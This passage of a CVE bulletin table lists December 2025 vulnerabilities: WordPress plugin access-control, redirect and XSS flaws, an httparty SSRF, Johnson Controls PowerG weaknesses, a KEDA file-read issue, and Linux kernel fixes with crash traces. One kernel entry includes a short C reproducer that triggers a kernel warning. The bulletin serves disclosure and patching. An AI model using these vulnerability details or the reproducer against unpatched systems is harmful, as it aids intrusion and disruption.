| JayBee--Twitch Player | Missing Authorization vulnerability in JayBee Twitch Player ttv-easy-embed-player allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Twitch Player: from n/a through <= 2.1.3. | 2025-12-24 | not yet calculated | CVE-2025-68565 | https://vdp.patchstack.com/database/Wordpress/Plugin/ttv-easy-embed-player/vulnerability/wordpress-twitch-player-plugin-2-1-3-broken-access-control-vulnerability?_s_id=cve |
| Jeff Starr--User Submitted Posts | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Jeff Starr User Submitted Posts user-submitted-posts allows Phishing. This issue affects User Submitted Posts: from n/a through <= 20251121. | 2025-12-24 | not yet calculated | CVE-2025-68509 | https://vdp.patchstack.com/database/Wordpress/Plugin/user-submitted-posts/vulnerability/wordpress-user-submitted-posts-plugin-20251121-open-redirection-vulnerability?_s_id=cve |
| Jegstudio--Gutenverse Form | Missing Authorization vulnerability in Jegstudio Gutenverse Form gutenverse-form allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Gutenverse Form: from n/a through <= 2.3.1. | 2025-12-24 | not yet calculated | CVE-2025-68511 | https://vdp.patchstack.com/database/Wordpress/Plugin/gutenverse-form/vulnerability/wordpress-gutenverse-form-plugin-2-3-1-broken-access-control-vulnerability?_s_id=cve |
| jnunemaker--httparty | httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd. | 2025-12-23 | not yet calculated | CVE-2025-68696 | https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4 https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240 |
| Johnson Controls--IQ Panels2, 2+, IQHub, IQPanel 4, PowerG | Use of a weak pseudo-random number generator, which may allow an attacker to read or inject encrypted PowerG packets. | 2025-12-22 | not yet calculated | CVE-2025-26379 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-350-02 |
| Johnson Controls--IQ Panels2, 2+, IQHub, IQPanel 4, PowerG | Due to nonce reuse, attackers can perform replay attacks or decrypt captured packets. | 2025-12-22 | not yet calculated | CVE-2025-61739 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-350-02 |
| Johnson Controls--IQ Panels2, 2+, IQHub, IQPanel 4, PowerG | Authentication issue that does not verify the source of a packet which could allow an attacker to create a denial-of-service condition or modify the configuration of the device. | 2025-12-22 | not yet calculated | CVE-2025-61740 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-350-02 |
| Johnson Controls--IQPanel2, IQHub, IQPanel2+, IQPanel 4, PowerG | Under certain circumstances, an attacker can capture the network key and read or write encrypted packets on the PowerG network. | 2025-12-22 | not yet calculated | CVE-2025-61738 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-350-02 https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories |
| Johnson Controls--iSTAR Ultra, iSTAR Ultra SE | Under certain circumstances a successful exploitation could result in access to the device. | 2025-12-24 | not yet calculated | CVE-2025-43875 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-01 |
| Johnson Controls--iSTAR Ultra, iSTAR Ultra SE | Under certain circumstances a successful exploitation could result in access to the device. | 2025-12-24 | not yet calculated | CVE-2025-43876 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-01 |
| kedacore--keda | KEDA is a Kubernetes-based Event Driven Autoscaling component. Prior to versions 2.17.3 and 2.18.3, an Arbitrary File Read vulnerability has been identified in KEDA, potentially affecting any KEDA resource that uses TriggerAuthentication to configure HashiCorp Vault authentication. The vulnerability stems from an incorrect or insufficient path validation when loading the Service Account Token specified in spec.hashiCorpVault.credential.serviceAccount. An attacker with permissions to create or modify a TriggerAuthentication resource can exfiltrate the content of any file from the node's filesystem (where the KEDA pod resides) by directing the file's content to a server under their control, as part of the Vault authentication request. The potential impact includes the exfiltration of sensitive system information, such as secrets, keys, or the content of files like /etc/passwd. This issue has been patched in versions 2.17.3 and 2.18.3. | 2025-12-22 | not yet calculated | CVE-2025-68476 | https://github.com/kedacore/keda/security/advisories/GHSA-c4p6-qg4m-9jmr https://github.com/kedacore/keda/commit/15c5677f65f809b9b6b59a52f4cf793db0a510fd |
| Kodezen LLC--Academy LMS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kodezen LLC Academy LMS academy allows Stored XSS. This issue affects Academy LMS: from n/a through <= 3.4.0. | 2025-12-24 | not yet calculated | CVE-2025-68527 | https://vdp.patchstack.com/database/Wordpress/Plugin/academy/vulnerability/wordpress-academy-lms-plugin-3-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Leap13--Premium Addons for Elementor | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Leap13 Premium Addons for Elementor premium-addons-for-elementor allows Retrieve Embedded Sensitive Data. This issue affects Premium Addons for Elementor: from n/a through <= 4.11.53. | 2025-12-24 | not yet calculated | CVE-2025-68494 | https://vdp.patchstack.com/database/Wordpress/Plugin/premium-addons-for-elementor/vulnerability/wordpress-premium-addons-for-elementor-plugin-4-11-53-sensitive-data-exposure-vulnerability?_s_id=cve |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mrp: introduce active flags to prevent UAF when applicant uninit The caller of del_timer_sync must prevent restarting of the timer. If we do not have this synchronization, there is a small probability that the cancellation will not be successful. And syzbot reported the following crash: ================================================================== BUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline] BUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605 Write at addr f9ff000024df6058 by task syz-fuzzer/2256 Pointer tag: [f9], memory tag: [fe] CPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008- ge01d50cbd6ee #0 Hardware name: linux,dummy-virt (DT) Call trace: dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156 dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline] show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163 __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:284 [inline] print_report+0x1a8/0x4a0 mm/kasan/report.c:395 kasan_report+0x94/0xb4 mm/kasan/report.c:495 __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320 do_bad_area arch/arm64/mm/fault.c:473 [inline] do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749 do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825 el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367 el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427 el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576 hlist_add_head include/linux/list.h:929 [inline] enqueue_timer+0x18/0xa4 kernel/time/timer.c:605 mod_timer+0x14/0x20 kernel/time/timer.c:1161 mrp_periodic_timer_arm net/802/mrp.c:614 [inline] mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627 call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474 expire_timers+0x98/0xc4 kernel/time/timer.c:1519 To fix it, we can introduce new active flags to make sure the timer will not restart. | 2025-12-24 | not yet calculated | CVE-2022-50697 | https://git.kernel.org/stable/c/98f53e591940e4c3818be358c5dc684d5b30cb56 https://git.kernel.org/stable/c/aacffc1a8dbf67c5463cb4f67b37143c01ca6fa9 https://git.kernel.org/stable/c/78d48bc41f7726113c9f114268d3ab11212814da https://git.kernel.org/stable/c/aadb1507a77b060c529edfeaf67f803e31461f24 https://git.kernel.org/stable/c/755eb0879224ffc2a43de724554aeaf0e51e5a64 https://git.kernel.org/stable/c/5d5a481a7fd0234f617535dc464ea010804a1129 https://git.kernel.org/stable/c/1a185fe83c2a60c1e3596fb9d82dbeb148dc09c6 https://git.kernel.org/stable/c/563e45fd5046045cc194af3ba17f5423e1c98170 https://git.kernel.org/stable/c/ab0377803dafc58f1e22296708c1c28e309414d6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: da7219: Fix an error handling path in da7219_register_dai_clks() If clk_hw_register() fails, the corresponding clk should not be unregistered. To handle errors from loops, clean up partial iterations before doing the goto. So add a clk_hw_unregister(). Then use a while (--i >= 0) loop in the unwind section. | 2025-12-24 | not yet calculated | CVE-2022-50698 | https://git.kernel.org/stable/c/4993c1511d66326f1037bc5156b024a6a96d23ef https://git.kernel.org/stable/c/f5f1f5ee5048cfa7bd07f496b33bd2cfc198a176 https://git.kernel.org/stable/c/ec692f0b51006de1138cd1f82cae625f0d2888d1 https://git.kernel.org/stable/c/cefce8bee0e988f9a005fe40705b98a25cfb7f9d https://git.kernel.org/stable/c/abb4e4349afe7eecdb0499582f1c777031e3a7c8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: selinux: enable use of both GFP_KERNEL and GFP_ATOMIC in convert_context() The following warning was triggered on a hardware environment: SELinux: Converting 162 SID table entries... BUG: sleeping function called from invalid context at __might_sleep+0x60/0x74 0x0 in_atomic(): 1, irqs_disabled(): 128, non_block: 0, pid: 5943, name: tar CPU: 7 PID: 5943 Comm: tar Tainted: P O 5.10.0 #1 Call trace: dump_backtrace+0x0/0x1c8 show_stack+0x18/0x28 dump_stack+0xe8/0x15c ___might_sleep+0x168/0x17c __might_sleep+0x60/0x74 __kmalloc_track_caller+0xa0/0x7dc kstrdup+0x54/0xac convert_context+0x48/0x2e4 sidtab_context_to_sid+0x1c4/0x36c security_context_to_sid_core+0x168/0x238 security_context_to_sid_default+0x14/0x24 inode_doinit_use_xattr+0x164/0x1e4 inode_doinit_with_dentry+0x1c0/0x488 selinux_d_instantiate+0x20/0x34 security_d_instantiate+0x70/0xbc d_splice_alias+0x4c/0x3c0 ext4_lookup+0x1d8/0x200 [ext4] __lookup_slow+0x12c/0x1e4 walk_component+0x100/0x200 path_lookupat+0x88/0x118 filename_lookup+0x98/0x130 user_path_at_empty+0x48/0x60 vfs_statx+0x84/0x140 vfs_fstatat+0x20/0x30 __se_sys_newfstatat+0x30/0x74 __arm64_sys_newfstatat+0x1c/0x2c el0_svc_common.constprop.0+0x100/0x184 do_el0_svc+0x1c/0x2c el0_svc+0x20/0x34 el0_sync_handler+0x80/0x17c el0_sync+0x13c/0x140 SELinux: Context system_u:object_r:pssp_rsyslog_log_t:s0:c0 is not valid (left unmapped). It was found that within a critical section of spin_lock_irqsave in sidtab_context_to_sid(), convert_context() (hooked by sidtab_convert_params.func) might cause the process to sleep via allocating memory with GFP_KERNEL, which is problematic. As Ondrej pointed out [1], convert_context()/sidtab_convert_params.func has another caller sidtab_convert_tree(), which is okay with GFP_KERNEL. Therefore, fix this problem by adding a gfp_t argument for convert_context()/sidtab_convert_params.func and pass GFP_KERNEL/_ATOMIC properly in individual callers. [PM: wrap long BUG() output lines, tweak subject line] | 2025-12-24 | not yet calculated | CVE-2022-50699 | https://git.kernel.org/stable/c/2723875e9d677401d775a03a72abab7e9538c20c https://git.kernel.org/stable/c/3006766d247bc93a25b34e92fff2f75bda597e2e https://git.kernel.org/stable/c/277378631d26477451424cc73982b977961f3d8b https://git.kernel.org/stable/c/abe3c631447dcd1ba7af972fe6f054bee6f136fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath10k: Delay the unmapping of the buffer On WCN3990, we are seeing a rare scenario where copy engine hardware is sending a copy complete interrupt to the host driver while still processing the buffer that the driver has sent; this is leading to an SMMU fault triggering a kernel panic. This is happening on copy engine channel 3 (CE3) where the driver normally enqueues WMI commands to the firmware. Upon receiving a copy complete interrupt, the host driver will immediately unmap and free the buffer, presuming that the hardware has processed the buffer. In the issue case, upon receiving the copy complete interrupt, the host driver will unmap and free the buffer, but since the hardware is still accessing the buffer (which in this case got unmapped in parallel), the SMMU hardware will trigger an SMMU fault resulting in a kernel panic. In order to avoid this, as a workaround, add a delay before unmapping the copy engine source DMA buffer. This is conditionally done for WCN3990 and only for the CE3 channel where the issue is seen. Below is the crash signature: wifi smmu error: kernel: [ 10.120965] arm-smmu 15000000.iommu: Unhandled context fault: fsr=0x402, iova=0x7fdfd8ac0, fsynr=0x500003,cbfrsynra=0xc1, cb=6 arm-smmu 15000000.iommu: Unhandled context fault:fsr=0x402, iova=0x7fe06fdc0, fsynr=0x710003, cbfrsynra=0xc1, cb=6 qcom-q6v5-mss 4080000.remoteproc: fatal error received: err_qdi.c:1040:EF:wlan_process:0x1:WLAN RT:0x2091: cmnos_thread.c:3998:Asserted in copy_engine.c:AXI_ERROR_DETECTED:2149 remoteproc remoteproc0: crash detected in 4080000.remoteproc: type fatal error <3> remoteproc remoteproc0: handling crash #1 in 4080000.remoteproc pc : __arm_lpae_unmap+0x500/0x514 lr : __arm_lpae_unmap+0x4bc/0x514 sp : ffffffc011ffb530 x29: ffffffc011ffb590 x28: 0000000000000000 x27: 0000000000000000 x26: 0000000000000004 x25: 0000000000000003 x24: ffffffc011ffb890 x23: ffffffa762ef9be0 x22: ffffffa77244ef00 x21: 0000000000000009 x20: 00000007fff7c000 x19: 0000000000000003 x18: 0000000000000000 x17: 0000000000000004 x16: ffffffd7a357d9f0 x15: 0000000000000000 x14: 00fd5d4fa7ffffff x13: 000000000000000e x12: 0000000000000000 x11: 00000000ffffffff x10: 00000000fffffe00 x9 : 000000000000017c x8 : 000000000000000c x7 : 0000000000000000 x6 : ffffffa762ef9000 x5 : 0000000000000003 x4 : 0000000000000004 x3 : 0000000000001000 x2 : 00000007fff7c000 x1 : ffffffc011ffb890 x0 : 0000000000000000 Call trace: __arm_lpae_unmap+0x500/0x514 __arm_lpae_unmap+0x4bc/0x514 __arm_lpae_unmap+0x4bc/0x514 arm_lpae_unmap_pages+0x78/0xa4 arm_smmu_unmap_pages+0x78/0x104 __iommu_unmap+0xc8/0x1e4 iommu_unmap_fast+0x38/0x48 __iommu_dma_unmap+0x84/0x104 iommu_dma_free+0x34/0x50 dma_free_attrs+0xa4/0xd0 ath10k_htt_rx_free+0xc4/0xf4 [ath10k_core] ath10k_core_stop+0x64/0x7c [ath10k_core] ath10k_halt+0x11c/0x180 [ath10k_core] ath10k_stop+0x54/0x94 [ath10k_core] drv_stop+0x48/0x1c8 [mac80211] ieee80211_do_open+0x638/0x77c [mac80211] ieee80211_open+0x48/0x5c [mac80211] __dev_open+0xb4/0x174 __dev_change_flags+0xc4/0x1dc dev_change_flags+0x3c/0x7c devinet_ioctl+0x2b4/0x580 inet_ioctl+0xb0/0x1b4 sock_do_ioctl+0x4c/0x16c compat_ifreq_ioctl+0x1cc/0x35c compat_sock_ioctl+0x110/0x2ac __arm64_compat_sys_ioctl+0xf4/0x3e0 el0_svc_common+0xb4/0x17c el0_svc_compat_handler+0x2c/0x58 el0_svc_compat+0x8/0x2c Tested-on: WCN3990 hw1.0 SNOC WLAN.HL.2.0-01387-QCAHLSWMTPLZ-1 | 2025-12-24 | not yet calculated | CVE-2022-50700 | https://git.kernel.org/stable/c/c4bedc3cda09d896c92adcdb6b62aa93b0c47a8a https://git.kernel.org/stable/c/79a124b588aadb5a22695542778de14366ff3219 https://git.kernel.org/stable/c/acd4324e5f1f11351630234297f95076f0ac9a2f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7921s: fix slab-out-of-bounds access in sdio host SDIO may need an additional 511 bytes to align bus operation. If the tailroom of this skb is not big enough, we would access an invalid memory region. For low level operation, increase the skb size to keep valid memory access in the SDIO host. Error message: [69.951] BUG: KASAN: slab-out-of-bounds in sg_copy_buffer+0xe9/0x1a0 [69.951] Read of size 64 at addr ffff88811c9cf000 by task kworker/u16:7/451 [69.951] CPU: 4 PID: 451 Comm: kworker/u16:7 Tainted: G W OE 6.1.0-rc5 #1 [69.951] Workqueue: kvub300c vub300_cmndwork_thread [vub300] [69.951] Call Trace: [69.951] <TASK> [69.952] dump_stack_lvl+0x49/0x63 [69.952] print_report+0x171/0x4a8 [69.952] kasan_report+0xb4/0x130 [69.952] kasan_check_range+0x149/0x1e0 [69.952] memcpy+0x24/0x70 [69.952] sg_copy_buffer+0xe9/0x1a0 [69.952] sg_copy_to_buffer+0x12/0x20 [69.952] __command_write_data.isra.0+0x23c/0xbf0 [vub300] [69.952] vub300_cmndwork_thread+0x17f3/0x58b0 [vub300] [69.952] process_one_work+0x7ee/0x1320 [69.952] worker_thread+0x53c/0x1240 [69.952] kthread+0x2b8/0x370 [69.952] ret_from_fork+0x1f/0x30 [69.952] </TASK> [69.952] Allocated by task 854: [69.952] kasan_save_stack+0x26/0x50 [69.952] kasan_set_track+0x25/0x30 [69.952] kasan_save_alloc_info+0x1b/0x30 [69.952] __kasan_kmalloc+0x87/0xa0 [69.952] __kmalloc_node_track_caller+0x63/0x150 [69.952] kmalloc_reserve+0x31/0xd0 [69.952] __alloc_skb+0xfc/0x2b0 [69.952] __mt76_mcu_msg_alloc+0xbf/0x230 [mt76] [69.952] mt76_mcu_send_and_get_msg+0xab/0x110 [mt76] [69.952] __mt76_mcu_send_firmware.cold+0x94/0x15d [mt76] [69.952] mt76_connac_mcu_send_ram_firmware+0x415/0x54d [mt76_connac_lib] [69.952] mt76_connac2_load_ram.cold+0x118/0x4bc [mt76_connac_lib] [69.952] mt7921_run_firmware.cold+0x2e9/0x405 [mt7921_common] [69.952] mt7921s_mcu_init+0x45/0x80 [mt7921s] [69.953] mt7921_init_work+0xe1/0x2a0 [mt7921_common] [69.953] process_one_work+0x7ee/0x1320 [69.953] worker_thread+0x53c/0x1240 [69.953] kthread+0x2b8/0x370 [69.953] ret_from_fork+0x1f/0x30 [69.953] The buggy address belongs to the object at ffff88811c9ce800 which belongs to the cache kmalloc-2k of size 2048 [69.953] The buggy address is located 0 bytes to the right of 2048-byte region [ffff88811c9ce800, ffff88811c9cf000) [69.953] Memory state around the buggy address: [69.953] ffff88811c9cef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [69.953] ffff88811c9cef80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [69.953] >ffff88811c9cf000: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [69.953] ^ [69.953] ffff88811c9cf080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [69.953] ffff88811c9cf100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc | 2025-12-24 | not yet calculated | CVE-2022-50701 | https://git.kernel.org/stable/c/8b5174a7f25d03df0ffa171ff86de383a89e8e89 https://git.kernel.org/stable/c/0b358e36433d2c46a65488a146bf8b4623fc5bbb https://git.kernel.org/stable/c/aec4cf2ea0797e28f18f8dbe01943a56d987fe56 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vdpa_sim: fix possible memory leak in vdpasim_net_init() and vdpasim_blk_init() When injecting a fault while probing the module, if device_register() fails in vdpasim_net_init() or vdpasim_blk_init() but the refcount of the kobject is not decreased to 0, the name allocated in dev_set_name() is leaked. Fix this by calling put_device(), so that the name can be freed in the callback function kobject_cleanup(). (vdpa_sim_net) unreferenced object 0xffff88807eebc370 (size 16): comm "modprobe", pid 3848, jiffies 4362982860 (age 18.153s) hex dump (first 16 bytes): 76 64 70 61 73 69 6d 5f 6e 65 74 00 6b 6b 6b a5 vdpasim_net.kkk. backtrace: [<ffffffff8174f19e>] __kmalloc_node_track_caller+0x4e/0x150 [<ffffffff81731d53>] kstrdup+0x33/0x60 [<ffffffff83a5d421>] kobject_set_name_vargs+0x41/0x110 [<ffffffff82d87aab>] dev_set_name+0xab/0xe0 [<ffffffff82d91a23>] device_add+0xe3/0x1a80 [<ffffffffa0270013>] 0xffffffffa0270013 [<ffffffff81001c27>] do_one_initcall+0x87/0x2e0 [<ffffffff813739cb>] do_init_module+0x1ab/0x640 [<ffffffff81379d20>] load_module+0x5d00/0x77f0 [<ffffffff8137bc40>] __do_sys_finit_module+0x110/0x1b0 [<ffffffff83c4d505>] do_syscall_64+0x35/0x80 [<ffffffff83e0006a>] entry_SYSCALL_64_after_hwframe+0x46/0xb0 (vdpa_sim_blk) unreferenced object 0xffff8881070c1250 (size 16): comm "modprobe", pid 6844, jiffies 4364069319 (age 17.572s) hex dump (first 16 bytes): 76 64 70 61 73 69 6d 5f 62 6c 6b 00 6b 6b 6b a5 vdpasim_blk.kkk. backtrace: [<ffffffff8174f19e>] __kmalloc_node_track_caller+0x4e/0x150 [<ffffffff81731d53>] kstrdup+0x33/0x60 [<ffffffff83a5d421>] kobject_set_name_vargs+0x41/0x110 [<ffffffff82d87aab>] dev_set_name+0xab/0xe0 [<ffffffff82d91a23>] device_add+0xe3/0x1a80 [<ffffffffa0220013>] 0xffffffffa0220013 [<ffffffff81001c27>] do_one_initcall+0x87/0x2e0 [<ffffffff813739cb>] do_init_module+0x1ab/0x640 [<ffffffff81379d20>] load_module+0x5d00/0x77f0 [<ffffffff8137bc40>] __do_sys_finit_module+0x110/0x1b0 [<ffffffff83c4d505>] do_syscall_64+0x35/0x80 [<ffffffff83e0006a>] entry_SYSCALL_64_after_hwframe+0x46/0xb0 | 2025-12-24 | not yet calculated | CVE-2022-50702 | https://git.kernel.org/stable/c/586e6fd7d581f987f7d0d2592edf0b26397e783e https://git.kernel.org/stable/c/5be953e353fe421f2983e1fd37f07fba97edbffc https://git.kernel.org/stable/c/337c24d817e28dd454ca22f1063dfad20822426e https://git.kernel.org/stable/c/aeca7ff254843d49a8739f07f7dab1341450111d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: qcom: smsm: Fix refcount leak bugs in qcom_smsm_probe() There are two refcount leak bugs in qcom_smsm_probe(): (1) The 'local_node' escapes from for_each_child_of_node() through the break of the iteration; we should call of_node_put() for it in the error path or when it is not used anymore. (2) The 'node' escapes from for_each_available_child_of_node() through the 'goto'; we should call of_node_put() for it at the goto target. | 2025-12-24 | not yet calculated | CVE-2022-50703 | https://git.kernel.org/stable/c/1bbe75d466e5118b7d49ef4a346c3ce5742da4e8 https://git.kernel.org/stable/c/bd4666bf5562fe8e8e5e9bd6fc805d30e1767f43 https://git.kernel.org/stable/c/42df28994eba7b56c762f7bbe7efd5611a1cd15b https://git.kernel.org/stable/c/1e3ed59370c712df436791efed120f0c082aa9bc https://git.kernel.org/stable/c/39781c98ad46b4e85053345dff797240c1ed7935 https://git.kernel.org/stable/c/96e0028debdd07a6d582f0dfadf9a3ec2b5fffff https://git.kernel.org/stable/c/8fb6112bd49c0e49f2cf51604231d85ff00284bb https://git.kernel.org/stable/c/ee7fc83ce0e6986ff9b1c1d7e994fbbf8d43861d https://git.kernel.org/stable/c/af8f6f39b8afd772fda4f8e61823ef8c021bf382 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: gadget: Fix use-after-free during usb config switch In the process of switching USB config from rndis to another config, if the hardware does not support the ->pullup callback, or the hardware encounters a low probability fault, both of them may cause the ->pullup callback to fail, which will then cause a system panic (use after free). The gadget drivers sometimes need to be unloaded regardless of the hardware's behavior. Analysis as follows: ======================================================================= (1) write /config/usb_gadget/g1/UDC "none" gether_disconnect+0x2c/0x1f8 rndis_disable+0x4c/0x74 composite_disconnect+0x74/0xb0 configfs_composite_disconnect+0x60/0x7c usb_gadget_disconnect+0x70/0x124 usb_gadget_unregister_driver+0xc8/0x1d8 gadget_dev_desc_UDC_store+0xec/0x1e4 (2) rm /config/usb_gadget/g1/configs/b.1/f1 rndis_deregister+0x28/0x54 rndis_free+0x44/0x7c usb_put_function+0x14/0x1c config_usb_cfg_unlink+0xc4/0xe0 configfs_unlink+0x124/0x1c8 vfs_unlink+0x114/0x1dc (3) rmdir /config/usb_gadget/g1/functions/rndis.gs4 panic+0x1fc/0x3d0 do_page_fault+0xa8/0x46c do_mem_abort+0x3c/0xac el1_sync_handler+0x40/0x78 0xffffff801138f880 rndis_close+0x28/0x34 eth_stop+0x74/0x110 dev_close_many+0x48/0x194 rollback_registered_many+0x118/0x814 unregister_netdev+0x20/0x30 gether_cleanup+0x1c/0x38 rndis_attr_release+0xc/0x14 kref_put+0x74/0xb8 configfs_rmdir+0x314/0x374 If gadget->ops->pullup() returns an error, the function rndis_close() will be called, and it then causes a use-after-free problem. ======================================================================= | 2025-12-24 | not yet calculated | CVE-2022-50704 | https://git.kernel.org/stable/c/30e926aa835ac2e6ad05822e4cb75833feb0d99f https://git.kernel.org/stable/c/99a58ac42d9b6911834b0224b6782aea0c311346 https://git.kernel.org/stable/c/afdc12887f2b2ecf20d065a7d81ad29824155083 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/rw: defer fsnotify calls to task context We can't call these off the kiocb completion as that might be off soft/hard irq context. Defer the calls to when we process the task_work for this request. That avoids valid complaints like: stack backtrace: CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.0.0-rc6-syzkaller-00321-g105a36f3694e #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/26/2022 Call Trace: <IRQ> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106 print_usage_bug kernel/locking/lockdep.c:3961 [inline] valid_state kernel/locking/lockdep.c:3973 [inline] mark_lock_irq kernel/locking/lockdep.c:4176 [inline] mark_lock.part.0.cold+0x18/0xd8 kernel/locking/lockdep.c:4632 mark_lock kernel/locking/lockdep.c:4596 [inline] mark_usage kernel/locking/lockdep.c:4527 [inline] __lock_acquire+0x11d9/0x56d0 kernel/locking/lockdep.c:5007 lock_acquire kernel/locking/lockdep.c:5666 [inline] lock_acquire+0x1ab/0x570 kernel/locking/lockdep.c:5631 __fs_reclaim_acquire mm/page_alloc.c:4674 [inline] fs_reclaim_acquire+0x115/0x160 mm/page_alloc.c:4688 might_alloc include/linux/sched/mm.h:271 [inline] slab_pre_alloc_hook mm/slab.h:700 [inline] slab_alloc mm/slab.c:3278 [inline] __kmem_cache_alloc_lru mm/slab.c:3471 [inline] kmem_cache_alloc+0x39/0x520 mm/slab.c:3491 fanotify_alloc_fid_event fs/notify/fanotify/fanotify.c:580 [inline] fanotify_alloc_event fs/notify/fanotify/fanotify.c:813 [inline] fanotify_handle_event+0x1130/0x3f40 fs/notify/fanotify/fanotify.c:948 send_to_group fs/notify/fsnotify.c:360 [inline] fsnotify+0xafb/0x1680 fs/notify/fsnotify.c:570 __fsnotify_parent+0x62f/0xa60 fs/notify/fsnotify.c:230 fsnotify_parent include/linux/fsnotify.h:77 [inline] fsnotify_file include/linux/fsnotify.h:99 [inline] fsnotify_access include/linux/fsnotify.h:309 [inline] __io_complete_rw_common+0x485/0x720 io_uring/rw.c:195 io_complete_rw+0x1a/0x1f0 io_uring/rw.c:228 iomap_dio_complete_work fs/iomap/direct-io.c:144 [inline] iomap_dio_bio_end_io+0x438/0x5e0 fs/iomap/direct-io.c:178 bio_endio+0x5f9/0x780 block/bio.c:1564 req_bio_endio block/blk-mq.c:695 [inline] blk_update_request+0x3fc/0x1300 block/blk-mq.c:825 scsi_end_request+0x7a/0x9a0 drivers/scsi/scsi_lib.c:541 scsi_io_completion+0x173/0x1f70 drivers/scsi/scsi_lib.c:971 scsi_complete+0x122/0x3b0 drivers/scsi/scsi_lib.c:1438 blk_complete_reqs+0xad/0xe0 block/blk-mq.c:1022 __do_softirq+0x1d3/0x9c6 kernel/softirq.c:571 invoke_softirq kernel/softirq.c:445 [inline] __irq_exit_rcu+0x123/0x180 kernel/softirq.c:650 irq_exit_rcu+0x5/0x20 kernel/softirq.c:662 common_interrupt+0xa9/0xc0 arch/x86/kernel/irq.c:240 | 2025-12-24 | not yet calculated | CVE-2022-50705 | https://git.kernel.org/stable/c/89a410dbd0f159ddd308f19d6eb682fc753e4771 https://git.kernel.org/stable/c/2a853c206e553dd9c0a55c22858fd6a446d93e15 https://git.kernel.org/stable/c/b000145e9907809406d8164c3b2b8861d95aecd1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/ieee802154: don't warn zero-sized raw_sendmsg() syzbot is hitting skb_assert_len() warning at __dev_queue_xmit() [1], for PF_IEEE802154 socket's zero-sized raw_sendmsg() request is hitting __dev_queue_xmit() with skb->len == 0. Since PF_IEEE802154 socket's zero-sized raw_sendmsg() request was able to return 0, don't call __dev_queue_xmit() if packet length is 0. ---------- #include <sys/socket.h> #include <netinet/in.h> int main(int argc, char *argv[]) { struct sockaddr_in addr = { .sin_family = AF_INET, .sin_addr.s_addr = htonl(INADDR_LOOPBACK) }; struct iovec iov = { }; struct msghdr hdr = { .msg_name = &addr, .msg_namelen = sizeof(addr), .msg_iov = &iov, .msg_iovlen = 1 }; sendmsg(socket(PF_IEEE802154, SOCK_RAW, 0), &hdr, 0); return 0; } ---------- Note that this might be a sign that commit fd1894224407c484 ("bpf: Don't redirect packets with invalid pkt_len") should be reverted, for skb->len == 0 was acceptable for at least PF_IEEE802154 socket. | 2025-12-24 | not yet calculated | CVE-2022-50706 | https://git.kernel.org/stable/c/4a36de8947794fa21435d1e916e089095f3246a8 https://git.kernel.org/stable/c/791489a5c56396ddfed75fc525066d4738dace46 https://git.kernel.org/stable/c/34f31a2b667914ab701ca725554a0b447809d7ef https://git.kernel.org/stable/c/df0da3fc131132b6c32a15c4da4ffa3a5aea1af2 https://git.kernel.org/stable/c/9974d220c5073d035b5469d1d8ecd71da86c7afd 